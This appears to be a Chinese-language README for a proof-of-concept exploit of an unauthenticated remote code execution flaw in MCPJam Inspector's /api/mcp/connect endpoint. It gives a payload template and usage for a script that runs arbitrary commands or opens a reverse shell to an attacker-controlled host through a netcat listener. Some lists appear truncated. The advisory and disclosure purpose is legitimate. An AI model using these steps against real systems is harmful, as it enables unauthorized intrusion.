CVE-2026-23744 是一个影响 MCPJam Inspector ≤ 1.4.2 的严重 未认证远程代码执行(RCE) 漏洞。问题在于 Inspector 暴露了一个管理端点(/api/mcp/connect),该端点接受用户可控的 MCP 服务器配置,并且可以在缺乏适当认证或安全限制的情况下触发进程执行。受影响版本默认监听 0.0.0.0(所有接口)而非 localhost,这使得服务在网络可达时可以被远程利用。
该漏洞与以下端点相关:
POST /api/mcp/connect
该端点接受一个包含服务器配置的 JSON 对象,例如:
{
"serverConfig": {
"command": "<executable>",
"args": ["<arguments>"],
"env": {}
},
"serverId": "<identifier>"
}
MCPJam Inspector 随后使用此提供的配置来创建和管理新的 MCP 服务器进程。由于该端点缺乏足够的认证和安全控制,攻击者可以提交任意进程定义,并由 Inspector 服务执行。
从根本上说,该漏洞是一个**关键功能缺少认证(CWE-306)**问题,即应用程序将原本面向可信本地用户的功能暴露出来,并在缺乏足够安全检查的情况下通过网络可访问。
该漏洞源于两个设计缺陷:
0.0.0.0。由此产生的攻击路径可如下所示:
Attacker → /api/mcp/connect → Process Creation → Operating System
由于应用程序直接与操作系统进程创建接口交互,成功利用可在 MCPJam Inspector 服务的安全上下文中执行任意命令。
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port>
-t(或)--target:目标 URL 或目标 IP 地址。-tport(或)--target-port:要连接的目标端口,大多数情况下 MCPJam Inspector 为 6274。如果 MCPJam Inspector 托管在其他位置(例如子域名或虚拟主机),请勿使用此参数,而应使用 -t 参数指定子域名或虚拟主机。-lhost(或)--local-host:用于反向 shell 回连的公网 IP 地址。-lport(或)--local-port:用于反向 shell 的端口。python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port> -c '<command>'
-c(或)--command:要在目标上执行的命令。在使用此程序之前,你必须先在本地机器上使用 Netcat 启动一个监听器。
为此,请使用以下命令:
nc -lvnp <port>
然后,运行上述命令即可在目标上获得一个反向 shell。
成功利用可能允许攻击者:
该漏洞被评定为 CVSS v3.1 评分 9.8(严重),原因是其基于网络的攻击向量、无需认证、无需用户交互,以及对机密性、完整性和可用性的高影响。
立即升级到 MCPJam Inspector 1.4.3 或更高版本。其他防御措施包括:
本 PoC 仅用于教育、防御性安全研究和授权的安全测试。它只能用于获得明确许可的系统。未经授权对第三方系统使用可能违反适用的法律法规。本仓库所有者不对因使用此程序造成的任何损害负责。